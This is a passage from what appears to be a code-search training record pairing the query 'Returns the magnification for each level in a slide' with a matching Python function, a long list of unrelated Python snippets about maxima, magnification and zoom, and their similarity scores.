MAX({cng.BBOX_DB_IMGRNR}) FROM {table}\")\r\n maxid: int = res.fetchall()[0][0]\r\n\r\n if maxid is None:\r\n return -1\r\n else:\r\n return maxid", "def rscale(mag=10.0):\n if mag > 11.5:\n return 0.5\n elif mag > 11.0:\n return 1.0\n elif mag > 10.5:\n return 1.5\n elif mag > 10.0:\n return 1.5\n elif mag > 9.5:\n return 2.0\n elif mag > 9.0:\n return 2.5\n elif mag > 8.5:\n return 3.0\n else:\n return 3.5", "def GetMaximum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL2_GetMaximum(self)", "def highest_value():\n maximum_number = 0\n for i in xrange(length):\n challenger = frames[i]\n if abs(challenger) > maximum_number:\n maximum_number = abs(challenger)\n return maximum_number", "def max_zoom(self) -> float:\n return math.log(np.min(self.canvas_size) / REGION_DIM)", "def get_rmax(self):\n return self.rmax", "def search_for_maximum(self):\n return self.maximise_aquisition(self.expected_improvement)", "def max(self):\n return self.get_first()", "def get_max_speed(self):\n if self.mot_type == 'ims':\n return self.get_par(\"max_speed\")\n elif self.mot_type == 'xps8p':\n return self.get_par(\"max_speed_xps\")\n else:\n return self.get_par(\"max_speed\")", "def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]", "def displacement_mag(self):\n print(3284 * math.pow(self.concentration, -0.158))\n\n return 3284 * math.pow(self.concentration, -0.158)", "def sim_max(sim_mats):\n return np.array(sim_mats).max(axis=0)", "def mag(self) -> float:\n return sqrt(self.sqr_mag())", "def max_flux(frame):\n return np.max(frame.fluxes[frame.radii <= max_extent_px])", "def detail(self):\n return self.uniform(\"detail\",\n self.img_scale * .05,\n self.img_scale * .2)", "def max_pwm(self):\r\n return self._max_pwm", "def zoom(self):\n res = np.max(self.metadata[\"resolution\"])\n\n if self.atlas_name == \"allen_human_500um\":\n logger.debug(\n \"ATLAS: setting zoom manually for human atlas, atlas needs fixing\"\n )\n return 350\n else:\n return 40 / res", "def getMaxMancount(self):\n return self.__size * 20", "def _get_med(self):\n return self.__med", "def get_max(self):\n current = self\n while current.hasRight(): # This is the belief that the max has to be to the right. If you can't go right either in the begining or any more\n # if current has a right this line will be set and will keep going from line 129 to 130 until there are no more rights.\n current = current.right\n # this line returns as soon there is no more rights. breaking out of the loop.\n return current.value", "def max(self):\n if 0 in type(self).flatten_shape(self.shape):\n raise ValueError(\"zero-size array has no maximum\")\n if self.isscalar():\n return self.defval\n # If not all blocks are set, then the tensor has an element of defval\n # somewhere.\n m = -np.inf if self.is_full() else self.defval\n for v in self.sects.values():\n try:\n m = max(m, np.max(v))\n except ValueError:\n # This block was zero-size, and has no elements.\n pass\n return m", "def IncludeMaxSlMsd(self):\r\n\t\treturn self._get_attribute('includeMaxSlMsd')", "def get_max(self):\n\t\tif self.right:\n\t\t\treturn self.right.get_max()\n\t\treturn self.value", "def max(self):\n if self.right is None:\n return self.item\n else:\n return self.right.max()", "def get_max(self):\n return self._max", "def get_max(self):\n raise NotImplementedError(\"This is an abstract method and needs to be implemented in derived classes.\")", "def get_max_cell_voltage(self): \n summary = \" \".join(self.get_summary().split())\n pattern = '\\$.... .. .*? .*? .*? .*? (.*?) . .*? .*? . . . .*?'\n maxv = float(re.findall(pattern,summary).pop())\n return maxv", "def max(self):\n\n return time_stat(self, stat=\"max\")", "def GetMaximum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS3_GetMaximum(self)", "def Qmax(self):\n return (4 * np.pi * np.sin(self.two_theta_max()*radians/2)\n / self.wavelength)", "def max(self):\n return self._max_coords", "def _get_max_rupture_projection_radius(self):\n if self.max_radius: # already computed\n return self.max_radius\n\n # extract maximum magnitude\n max_mag, _rate = self.get_annual_occurrence_rates()[-1]\n for (np_prob, np) in self.nodal_plane_distribution.data:\n # compute rupture dimensions\n rup_length, rup_width = _get_rupture_dimensions(self, max_mag, np)\n # compute rupture width surface projection\n rup_width = rup_width * math.cos(math.radians(np.dip))\n # the projection radius is half of the rupture diagonal\n radius = math.sqrt(rup_length ** 2 + rup_width ** 2) / 2.0\n if radius > self.max_radius:\n self.max_radius = radius\n return self.max_radius", "def GetMaximum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL3_GetMaximum(self)", "def max(self):\n return self.__max", "def density_maxima(self, samplesize=5, thresh_mod=0):\r\n filtered = ndimage.maximum_filter(self.data, size=(samplesize, samplesize, samplesize), mode=\"wrap\")\r\n\r\n threshold = filtered.mean() + thresh_mod\r\n print(f\"actual threhold value: {threshold:.2f}\")\r\n labels, num_labels = ndimage.label(filtered > threshold)\r\n\r\n # Coordinates of maxima\r\n pos = np.array(ndimage.measurements.center_of_mass(np.asarray(self.data), labels=labels,\r\n index=np.arange(1, num_labels + 1)))\r\n\r\n # Values of maxima\r\n val = np.array(ndimage.measurements.maximum(self.data, labels=labels, index=np.arange(1, num_labels + 1)))\r\n\r\n pos[:, 0] *= iCube.x[0]\r\n pos[:, 1] *= iCube.y[1]\r\n pos[:, 2] *= iCube.z[2]\r\n\r\n return pos, val", "def findMaxFactor(self):\n factorMax = 0\n factorMaxInd = ''\n for ue in list(self.ues.keys()):\n if len(self.ues[ue].bearers[0].buffer.pckts)>0 and self.ues[ue].pfFactor>factorMax:\n factorMax = self.ues[ue].pfFactor\n factorMaxInd = ue\n if factorMaxInd=='':\n ue = list(self.ues.keys())[self.ind_u]\n q = 0\n while len(self.ues[ue].bearers[0].buffer.pckts)==0 and q<len(self.ues):\n self.updIndUE()\n ue = list(self.ues.keys())[self.ind_u]\n q = q + 1\n factorMaxInd = ue\n\n return factorMaxInd", "def get_prior_mag(mag_dict):\n print(\"GETTING MAGNITUDE\")\n print(mag_dict)\n print(type(mag_dict))\n mag = 17\n if not isinstance(mag_dict, dict):\n print(\"Not a dictionary so using mag=17\")\n return mag\n\n for k, v in mag_dict.items():\n mag = v['mag']\n\n try:\n mag = float(mag)\n except Exception as e:\n print(str(e), \"Error getting magnitude\")\n mag = 17\n print(mag)\n return mag", "def filmHeight(self):\r\n cls = mxs.classof(self._nativePointer)\r\n height = None\r\n if cls == mxs.VRayPhysicalCamera:\r\n\r\n # TODO: Why is that wrapped in a try except?\r\n try:\r\n height = self._nativePointer.film_height\r\n except AttributeError:\r\n pass\r\n\r\n elif cls == mxs.Physical:\r\n height = self._nativePointer.film_height_mm\r\n\r\n if not height:\r\n # If we failed to get a width from a camera, return the scene aperture setting.\r\n height = self.filmWidth() * (mxs.renderPixelAspect / mxs.getRendImageAspect())\r\n\r\n return height", "def max_flux(self):\n return np.max(self.flux)", "def getZoomFactor(imageSize, maxW, maxH):\n\timageW, imageH = imageSize\n\tzoomW = float(imageW) / float(maxW)\n\tzoomH = float(imageH) / float(maxH)\n\treturn max(zoomW, zoomH)", "def max_beam_images(self):\n return self._max_beam_images", "def find_max_f():\n fmax = fmin(g, 2)\n return fmax[0]", "def get_max(self):\n return self.serie.max()", "def magnitude(x):\n return x.magnitude if hasattr(x, 'magnitude') else x", "def get_height():\n return resize.transforms[1].size", "def maxproba(proba):\r\n lenp = len(proba)\r\n m=0\r\n for i in range(0,lenp):\r\n if proba[i]>m:\r\n m=proba[i]\r\n im=i\r\n return im,m", "def find_max(ls):\n\n if len(ls) == 1:\n return ls[0]\n elif len(ls) == 2:\n return ls[0] if ls[0] > ls[1] else ls[1]\n else:\n mid = len(ls) // 2\n m1 = find_max(ls[0:mid])\n m2 = find_max(ls[mid:])\n return m1 if m1 > m2 else m2", "def GetMaximum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUC2_GetMaximum(self)", "def find_max(self):\r\n maxVal = self.items[1]\r\n if maxVal is None:\r\n return None\r\n \r\n for i in range(1,len(self.items)):\r\n if self.items[i] is not None:\r\n if self.items[i] > maxVal:\r\n maxVal = self.items[i]\r\n return maxVal", "def argMax(self):\n if len(self.keys()) == 0: return None\n all = list(self.items())\n values = [x[1] for x in all]\n maxIndex = values.index(max(values))\n return all[maxIndex][0]", "def get_maximum ( self, object ):\n return self.maximum", "def resolution(self):\n return Prism.resolution(self,self.beam,self.wavelength)", "def large_image(self) -> Optional[str]:\n return pulumi.get(self, \"large_image\")", "def max(self):\n max = 0\n a = self.array_form\n for i in xrange(len(a)):\n if a[i] != i and a[i] > max:\n max = a[i]\n return max" ]
[ "0.7143382", "0.6984062", "0.6947595", "0.6700194", "0.6502702", "0.6465279", "0.6439392", "0.6389368", "0.62770873", "0.62758964", "0.6203424", "0.6182897", "0.6060569", "0.6010728", "0.6000861", "0.59334785", "0.5931892", "0.59017086", "0.5889821", "0.58670044", "0.584315", "0.5836564", "0.5819528", "0.58193827", "0.5767667", "0.57545245", "0.57338196", "0.57338196", "0.57338196", "0.57338196", "0.57338196", "0.57338196", "0.5732309", "0.5731987", "0.5663565", "0.5642731", "0.5636096", "0.5597078", "0.5573451", "0.55569696", "0.5552699", "0.5549281", "0.5542545", "0.55348825", "0.5518305", "0.5510751", "0.5508867", "0.5480722", "0.54769933", "0.5470182", "0.5468581", "0.5465213", "0.5463161", "0.5460845", "0.54591256", "0.54568875", "0.54559207", "0.5455431", "0.5454881", "0.5447061", "0.54389954", "0.5431356", "0.5430824", "0.54300654", "0.54294497", "0.54282445", "0.5423922", "0.5410876", "0.5387469", "0.5379711", "0.53593296", "0.53570735", "0.53563696", "0.53462887", "0.53331196", "0.53255486", "0.5323764", "0.5313361", "0.5294098", "0.5291997", "0.52792776", "0.5272223", "0.5265786", "0.5258698", "0.5257062", "0.52568156", "0.5255734", "0.5252752", "0.52469915", "0.5246549", "0.5244111", "0.5242065", "0.52387273", "0.5235481", "0.52347136", "0.5234382", "0.523364", "0.5230497", "0.5228626", "0.52204144" ]
0.8554771
0
Returns the magnification for each level in a slide
def level_mags(slide): return [highest_mag(slide)/downsample for downsample in slide.level_downsamples]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_level_mag(slide, level):\n return level_mags(slide)[level]", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def get_level_for_mag(slide, mag):\n level_mags_rounded = list(np.round(level_mags(slide), decimals = 2))\n if mag in level_mags_rounded:\n return level_mags_rounded.index(mag)\n else: \n return None", "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def get_size_for_mag(slide, mag):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = max_mag/mag\n return [np.int(np.round(dim/downsample)) for dim in max_size]", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def get_mag_for_size(slide, size):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = np.average([max_dim/size_dim for max_dim, size_dim in zip(max_size, size)])\n return max_mag/downsample", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def get_level_size(slide, level):\n return slide.level_dimensions[level]", "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def read_slide_at_mag(slide, mag):\n exact_level = get_level_for_mag(slide, mag)\n if exact_level is not None:\n return slide.read_region((0,0), exact_level, get_level_size(slide, exact_level))\n else:\n max_size = slide.dimensions\n region_size = tuple(get_size_for_mag(slide, mag))\n downsample = np.average([max_dim/region_dim for max_dim, region_dim in zip(max_size, region_size)])\n best_level = slide.get_best_level_for_downsample(downsample)\n best_level_size = get_level_size(slide, best_level)\n best_level_img = slide.read_region((0,0), best_level, best_level_size)\n return best_level_img.resize(region_size, resample = Image.BICUBIC)", "def get_illustrations(self):\n \n temp=[[\"middle\",[],0,0],[\"middle\",[],0,0],[\"center\",[],0,0]]\n for pic in self.illustrations.all():\n \n if pic.position==\"L\":\n temp[0][1].append(pic)\n temp[0][2]=max(temp[0][2],pic.width)\n temp[0][3]+=pic.height\n elif pic.position==\"R\":\n temp[1][1].append(pic)\n temp[1][2]=max(temp[1][2],pic.width)\n temp[1][3]+=pic.height\n else:\n temp[2][1].append(pic)\n temp[2][2]+=pic.width\n temp[2][3]=max(temp[2][3],pic.height)\n temp[0][3]=max(temp[0][3],temp[1][3])\n temp[1][3]=temp[0][3]\n if len(temp[2][1])>0:\n pos = temp[2][1][0].position\n if pos == \"BR\":\n temp[2][0] = \"right\"\n elif pos == \"BL\":\n temp[2][0] = \"left\"\n for i in range(2):\n if len(temp[i][1])>0:\n pos = temp[i][1][0].position\n if pos in [\"RT\",\"LT\"]:\n temp[i][0] = \"top\"\n elif pos in [\"RB\",\"LB\"]:\n temp[i][0] = \"bottom\"\n self.text_size=(-temp[0][2]-temp[1][2],-temp[2][3])\n print(temp)\n return temp", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def get_mag(self):\n raise NotImplementedError", "def _magsamples(self):\n if self._derived_properties[\"magsamples\"] is None:\n if self.lbda is None:\n raise AttributeError(\"lbda not set.\")\n self.derive_magsamples()\n \n return self._derived_properties[\"magsamples\"]", "def extract_level_from_name(self):\n images = glob.glob(os.path.join(self.frame_dir, '*'))\n level = []\n for i, im in enumerate(images):\n base, tail = os.path.split(im)\n name = tail.split('.')[-2]\n number = name.split('_')[-1]\n level.append(float(number))\n return np.array(level)", "def medoidMosaic(self,collection):\n \n\t\t# calculate the median of temp band\n\t\tthermal = ee.ImageCollection(collection.select(['thermal'])).median()\n \n\t\tcollection = collection.select(self.env.divideBands)\n\n\t\tbandNames = self.env.divideBands;\n\t\tbandNumbers = ee.List.sequence(1,bandNames.length());\n \n\t\t# calculate medion\n\t\tmedian = ee.ImageCollection(collection).median()\n \n\t\tdef subtractmedian(img):\n\t\t\tdiff = ee.Image(img).subtract(median).pow(ee.Image.constant(2));\n\t\t\treturn diff.reduce('sum').addBands(img);\n \n\t\tmedoid = collection.map(subtractmedian)\n \n\t\tmedoid = ee.ImageCollection(medoid).reduce(ee.Reducer.min(bandNames.length().add(1))).select(bandNumbers,bandNames);\n \n\t\treturn medoid.addBands(thermal);", "def getNativeMagnification(self):\n return self._nativeMagnification.copy()", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def getMagnitudes(self):\n return self._bmag, self._vmag, self._jmag, self._hmag, self._kmag", "def load_slide(self, fileName):\n image = open_slide(fileName)\n dims = image.level_dimensions\n ratio = np.array(image.level_dimensions[0])/np.array(image.level_dimensions[-1])\n\n return image, dims, ratio", "def setMagnificationsInTiltSeries(self, TiltSeries_):\n kk = 0\n for proj in TiltSeries_._ProjectionList._list:\n proj.setAlignmentMagnification(self._alignmentMagnifications[kk])\n kk = kk + 1", "def detail(self):\n return self.uniform(\"detail\",\n self.img_scale * .05,\n self.img_scale * .2)", "def add_mosaics(self):\n for tree in self.mosaictrees:\n self.add_mosaic(tree, -1)", "def getMagnificationsFromTiltSeries(self, TiltSeries_):\n # initialize alignment in seperate array - easier for optimization\n self._alignmentMagnifications = len(TiltSeries_._ProjectionList._list) * [1.]\n for (kk, proj) in enumerate(TiltSeries_._ProjectionList._list):\n self._alignmentMagnifications[kk] = proj.getAlignmentMagnification()\n return self._alignmentMagnifications", "def _get_med(self):\n return self.__med", "def tile_gen_at_mag(wsi, mag, tile_size):\n #Get size of WSI at Level 0 (Max Magnification)\n x0, y0 = wsi.level_dimensions[0]\n #Get size of WSI at the mag we want\n x_mag, y_mag = get_size_for_mag(wsi, mag)\n x_tiles = int(np.floor(x_mag/tile_size))\n y_tiles = int(np.floor(y_mag/tile_size))\n #Scale tile size accordingly\n scale = highest_mag(wsi)/mag\n yield (x_tiles, y_tiles)\n tiles = []\n for y in range(y_tiles):\n for x in range(x_tiles):\n x_coord = round(x*scale*tile_size)\n y_coord = round(y*scale*tile_size)\n scaled_tile_size = round(scale*tile_size)\n tile = wsi.read_region((x_coord, y_coord), 0, (scaled_tile_size, scaled_tile_size))\n yield tile.resize((tile_size, tile_size), resample = Image.BICUBIC)", "def getMagnification(self, pixelSize=0.0129, isFilter=False, erodeIter=None):\r\n\r\n if not hasattr(self, 'determinantMap'):\r\n _ = self._getDeterminantMap()\r\n\r\n if hasattr(self, 'finalPathesMarked'):\r\n finalPatches = self.finalPatchesMarked\r\n elif hasattr(self, 'finalPatches'):\r\n finalPatches = self.finalPatches\r\n else:\r\n self.processTrial()\r\n finalPatches = self.finalPatches\r\n\r\n magMap = 1 / self.determinantMap\r\n\r\n if isFilter:\r\n magMap = ni.filters.gaussian_filter(magMap, self.params['signMapFilterSigma'])\r\n\r\n # get mean power amplitude for all visual areas normalized by V1\r\n magDict = {}\r\n for key, patch in finalPatches.items():\r\n array = patch.array.astype(np.float)\r\n\r\n if erodeIter:\r\n array = ni.binary_erosion(array, iterations=erodeIter)\r\n\r\n area = np.sum(array)\r\n\r\n totalMag = np.sum(array * magMap)\r\n\r\n magDict.update({key: (pixelSize ** 2) * totalMag / area})\r\n\r\n return magDict", "def get_magmom_string():\n\n magmoms = []\n poscar_lines = open('POSCAR').readlines()\n elements = poscar_lines[5].split()\n amounts = poscar_lines[6].split()\n for i in range(len(elements)):\n if Element(elements[i]).is_transition_metal:\n magmoms.append('{}*6.0'.format(amounts[i]))\n else:\n magmoms.append('{}*0.5'.format(amounts[i]))\n return ' '.join(magmoms)", "def calculateRatio(levelDims):\n highestReso = np.asarray(levelDims[0])\n lowestReso = np.asarray(levelDims[-1])\n Xratio, Yratio = highestReso/lowestReso\n return (Xratio, Yratio)", "def scale_mag_1(x):\n return np.array([np.true_divide(ui, mag(x)) for ui in x])", "def get_map_size(level):\n if level < 5:\n return 5, 5\n if level < 70:\n return 10, 10\n if level < 150:\n return 25, 25\n return 50, 50", "def plot_instructions_lim_mags(self):\n return self.__plot_instructions_lim_mags", "def refmags(self):\n return self.__ref_mags", "def _get_depth_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Depth/0.125/\"\n else:\n return \"Depth/0.25/\"\n else: \n return \"Depth/\"", "def medias(self):\r\n return Medias(self)", "def galaxy(img):\n return img[420:490, 710:770]", "def getModifiers(self, img_info):\n modifiers = \"\"\n width_percent_reduction = 0\n height_percent_reduction = 0\n max_width = float(self.cfg().chatimg.max_width)\n max_height = float(self.cfg().chatimg.max_height)\n if max_width and img_info.width > max_width:\n width_percent_reduction = (img_info.width / max_width) - 1.0\n if max_height and img_info > max_height:\n height_percent_reduction = (img_info.height / max_height) - 1.0\n\n if width_percent_reduction > 0 and width_percent_reduction > height_percent_reduction:\n modifiers = \" width=\\\"%s\\\" \" % max_width\n elif height_percent_reduction > 0:\n modifiers = \" height=\\\"%d\\\" \" % max_height\n\n return modifiers", "def GetScale(self):\n ...", "def magn(names, values, data, model_key, plot_key=False):\n # Making sure number of parameters matches number of names given:\n assert len(names) == len(values), \"len(names) != len(values) in datasim.magn\"\n\n zpicks = data['zpicks']\n # Corrected absolute magnitude M of SN.\n M = values[0]\n\n# dlpc, da, integrated_zpicks, integrated_dlpc, plot_var = zodesolve.zodesolve(names, values, zpicks, model_key, plot_key)\n\n dlpc, da, plot_var = zodesolve.zodesolve(names, values, zpicks, model_key, plot_key)\n\n # Calculating apparent magnitudes of supernovae at the simulated\n # luminosity distances using the distance modulus formula.\n mag = 5 * np.log10(dlpc/10) + M\n# integrated_mag = 5 * np.log10(integrated_dlpc/10) + M\n# print('redshift =',zpicks[-1],'da =', da[-1])\n\n# # plotting interpoated data vs input and full\n# import matplotlib.pyplot as plt\n# import matplotlib as mpl\n# #mpl.style.use('default') # has to be switched on to set figure size\n# mpl.style.use('fivethirtyeight')\n# plt.rcParams['axes.facecolor'] = 'white'\n# plt.rcParams['figure.facecolor'] = 'white'\n# plt.rcParams['grid.color'] = 'white'\n#\n# print('integrated_zpicks',integrated_zpicks[0])\n# print('zpicks', zpicks[0])\n#\n# plt.figure()\n# plt.scatter(integrated_zpicks, integrated_mag, s=70, label='integrated', c=\"C{}\".format(0))\n# plt.plot(zpicks, mag, label='interpolated', linestyle='-', c=\"C{}\".format(1))\n# plt.legend()\n\n if plot_key:\n # Plotting evolution of parameters in the model.\n import plots\n plots.modelcheck(mag, zpicks, plot_var, model_key)\n\n return mag, da", "def scale(self):", "def difficulty(mag):\n mag = float(mag)\n if mag <= -4:\n return \"Visible in daytime.\"\n elif mag <= 6:\n return \"Visible at night.\"\n else:\n flux = mag_def(\"%s x\" % mag)\n needed_flux = mag_def(\"6 x\")\n eye_area = math.pi * (0.005**2)\n needed_power = needed_flux * eye_area\n diameter = 2 * math.sqrt(needed_power / (flux*math.pi))\n return \"%s m telescope needed.\" % diameter", "def calcMag(self):\n M = np.sum(self.config)\n return M", "def mag(self) -> complex:\n return self.major_extent", "def magnitude(x):\n return x.magnitude if hasattr(x, 'magnitude') else x", "def getMagFlux(self):\n return self.magflux", "def visualise_patches_on_slide(ps: PatchSet, vis_level: (int), project_root: Path = Path('/')) -> Image:\n assert len(ps.settings) == 1, \"The input patch set contains patches from more than one slide, or more than one patch size / level\"\n slide_settings = ps.settings[0] \n\n def convert_ps_to_thumb_level(ps, thumb_lev):\n ps_df = ps.df.copy()\n level_diff = thumb_lev - ps.settings[0].level\n ps_df.x = ps_df.x.divide(2 ** level_diff).astype(int)\n ps_df.y = ps_df.y.divide(2 ** level_diff).astype(int)\n thumb_patch_size = slide_settings.patch_size // 2 ** level_diff\n return PatchSet(ps_df, [PatchSetting(slide_settings.level, thumb_patch_size, slide_settings.slide_path, slide_settings.loader)])\n\n def create_visualisation_frame(ps_in):\n vis_frame = ps_in.df\n # TODO: ps.settings[0] as only one settings is there a neater way to do this\n vis_frame[\"x2\"] = vis_frame.x.add(ps_in.settings[0].patch_size)\n vis_frame[\"y2\"] = vis_frame.y.add(ps_in.settings[0].patch_size)\n return vis_frame\n\n with slide_settings.loader.load_slide(project_root / slide_settings.slide_path) as slide:\n thumb = slide.get_thumbnail(vis_level)\n \n thumb = Image.fromarray(np.array(thumb, dtype=np.uint8))\n ps_out = convert_ps_to_thumb_level(ps, vis_level)\n vis_frame = create_visualisation_frame(ps_out)\n\n thumbdraw = ImageDraw.Draw(thumb) \n for row in vis_frame.itertuples():\n thumbdraw.rectangle([row.x, row.y, row.x2, row.y2], fill=None, outline='black', width=1)\n \n return thumb", "def GetTextureDimensions(self):\n ...", "def my_phantomgallery( phantom_type ):\n\n if phantom_type == 'ellipses' or phantom_type == 'shepp_logan':\n # [semiaxis 1, semiaxis 2, x center, y center, phi=angle (degrees), greyscale=attenuation]\n M = np.array([[ .69, .92, 0, 0, 0, 1.],\n [ .6624, .8740, 0, -.0184, 0, -0.8],\n [ .1100, .3100, .22, 0, -18, -.2],\n [ .1600, .4100, -.22, 0, 18, -.2],\n [ .2100, .2500, 0, .35, 0, .1],\n [ .0460, .0460, 0, .1, 0, .1],\n [ .0460, .0460, 0, -.1, 0, .1],\n [ .0460, .0230, -.08, -.605, 0, .1],\n [ .0230, .0230, 0, -.605, 0, .1],\n [ .0230, .0460, .06, -.605, 0, .1]])\n\n\n elif phantom_type == 'modified_shepp_logan':\n # [semiaxis 1, semiaxis 2, x center, y center, phi=angle (degrees), greyscale=attenuation]\n p1 = [.7, .8, 0, 0, 0, 1]\n p2 = [.65,.75,0,0,0,-.9]\n p3 = [.15,.2,0,.4,0,.5]\n p4 = [.25,.15,-.25,.25,135.79,.2]\n p5 = [.25,.15,.25,.25,45.26,.2]\n p6 = [.08,.25,0,-.3,28.65,.65]\n p7 = [.05,.05,.5,-.3,0,.8]\n # combine into a matrix with one ellipse in each row\n M = np.array([p1, p2, p3, p4, p5, p6, p7]);\n \n\n\n elif phantom_type == 'squares':\n # [x center, y center, edge length ,phi=angle (degrees), greyscale=attenuation]\n s1 = [0,0,1.3,0,1]\n s2 = [0,0,1.1,0,-.9]\n s3 = [.1,-.1,.5,180/6,.4]\n s4 = [-.25,.15,.25,180/4,.2]\n s5 = [-.2,.25,.3,180/3,.4]\n #combine into a matrix with one square in each row\n M = np.array([s1, s2, s3, s4, s5]);\n\n elif (phantom_type == 'rectangles'):\n # [x center, y center, dimension 1, dimension 2, phi=angle (degrees), greyscale=attenuation]\n r1 = [0,0,1.3,1.1,0,1]\n r2 = [0,0,1.2,1,0,-.9]\n r3 = [0.25,.15,.25,.6,180/6,.4]\n r4 = [-.2,.1,.25,.20,180/4,.2]\n r5 = [-.3,.2,.3,.2,180/6,.4]\n #combine into a matrix with one square in each row\n M = np.array([r1, r2, r3, r4, r5])\n else:\n print('Unknown phantom_type')\n M = None\n\n return M", "def _get_normal_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Normals/0.125/\"\n else:\n return \"Normals/0.25/\"\n else: \n return \"Normals/\"", "def resolution(self, level):\n return 2 ** (level - 1)", "def resolution(self):\n return Prism.resolution(self,self.beam,self.wavelength)", "def normalize_zoomlvl(lvl):\n if lvl < gMinZoomLevel:\n return gMinZoomLevel\n elif lvl > gMaxZoomLevel:\n return gMaxZoomLevel\n else:\n return lvl - gMinZoomLevel", "def _get_image_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Rectified_rescaled/0.125/\"\n else:\n return \"Rectified_rescaled/0.25/\"\n else:\n return \"Rectified/\"", "def LoadMMMetaData(filename):\r\n## print \"loading MM Metadata\"\r\n file = open(filename,'r')\r\n data = file.read()\r\n file.close()\r\n data = data.replace(\"false\",\"False\")\r\n data = data.replace(\"true\",\"True\")\r\n data = data.replace(\"null\",\"0\")\r\n f = eval(str(data))\r\n tiles = []\r\n for i in f.keys():\r\n if i != \"Summary\":\r\n tiles.append(i)\r\n xpos = f[tiles[0]][\"XPositionUm\"]\r\n ypos = f[tiles[0]][\"YPositionUm\"]\r\n zpos = f[tiles[0]][\"ZPositionUm\"] \r\n ScaleFactorX= f[\"Summary\"][\"PixelSize_um\"]\r\n ScaleFactorY= ScaleFactorX\r\n Width=f[\"Summary\"][\"Width\"]\r\n Height=f[\"Summary\"][\"Height\"]\r\n extent=[xpos-(Width/2)*ScaleFactorX,xpos+(Width/2)*ScaleFactorX,\\\r\n ypos-(Height/2)*ScaleFactorY,ypos+(Height/2)*ScaleFactorY] #FOR NOW\r\n\r\n #WHY WAS IT + THEN - FOR Y??\r\n return extent,zpos", "def getMeasure(unique_name):", "def getMeasure(unique_name):", "def take_mag(x, dim=1):\n power = torch.stack(torch.chunk(x, 2, dim=dim), dim=-1).pow(2).sum(dim=-1)\n power = power + EPS\n return power.pow(0.5)", "def extractScale(self,groups):\n self.scaleX = float(groups[0])\n self.scaleY = float(groups[0])\n if len(groups) == 2 and groups[1]:\n self.scaleY = float(groups[1])\n self.matrix = [[self.scaleX, 0.0, 0.0], \\\n [0.0, self.scaleY, 0.0]]", "def zoom_augmentation():\n # Get the width and the height of the zoomed version\n x_len, y_len = np.random.randint(250, 350, size=2)\n # Get left upper ,right and lower bound of the pixels in the original image\n left = np.random.randint(x_size-x_len)\n upper = np.random.randint(y_size-y_len)\n right, lower = left + x_len, upper+y_len\n # Crops the box and resizes it to the original image size\n box = (left, upper, right, lower)\n return lambda image: image.transform(image.size, Image.EXTENT, box)", "def getM(self):\r\n return self.M", "def getMosaic(self):\n from .gsMosaic import Mosaic\n mfn = Mosaic(self.mosaicFilename, \"r\")\n\n return mfn", "def lphot(self):\n return self._get_mean_and_samples_attribute('lphot')", "def limmags(self):\n return self.__lim_mags", "def ratio_4_doc(shot, dir, num_probes = 16):\n # data = [[0] *3 for i in range(num_probes)]\n # magdata = hdr.getMagData(shot)\n probe_locs = get_probeLocs_calib_setup(shot)\n data=hdr.getquikData(shot)\n time,eastcurrent,westcurrent = loadcurrent(shot)#using eastcurrent\n ratios = [[0]*3 for i in range(num_probes)]\n for probe in range(num_probes):\n ratio =1\n inverted = False\n # fig, (ax1, ax2, ax3) = plt.subplots(3, 1, sharex=True)\n B=sp.signal.detrend(cumtrapz(data.unCalibData[dir,probe,:], data.time))\n plot_time = data.time[:-1]\n if(np.max(B[2000:6000]) < abs(np.average(B[2000:6000]))):\n # print(\"\\ninverted!\")\n inverted = True\n # B = B* -1\n # ratio = -1\n\n r = probe_locs[probe]\n max_current = polyPeak_noPlot(time,eastcurrent)\n # if(np.max(eastcurrent) < -1*(np.min(eastcurrent))):\n # max_current = -1*np.min(eastcurrent)\n helmB = helmholtz2(r,max_current)\n\n # THis is intentional! I am only using shots where the cmponent is lined\n # up with the z-direction of the helmholz field\n # helmB[2] = helmB[2]*-1\n max_theoretical = np.max(helmB[2])\n max_measured = polyPeak_noPlot(plot_time, B)\n\n\n ratio = ratio * max_theoretical/max_measured\n if ratio > 30000 or ratio < -30000:\n ratio = 0\n\n\n ratios[probe][dir] = ratio\n # print(\"\\tRatio is: %f\" %(ratio))\n # if(inverted and ratio <0):\n # print(\"Inverted and ratio reflects that\")\n # elif(not inverted and ratio <0):\n if probe ==1:\n print(\"\\n Ratio: %5f \\n\\t max_measured: %3f, \\n\\t max_theoretical: %5f\"%(ratio,max_measured,max_theoretical ) )\n\n # Compute the median of the non-zero elements\n # m = np.median(foo[foo > 0])\n # Assign the median to the zero elements\n # foo[foo == 0] = m\n return ratios", "def mag(field):\n return np.sqrt(np.sum(field**2, axis=0, 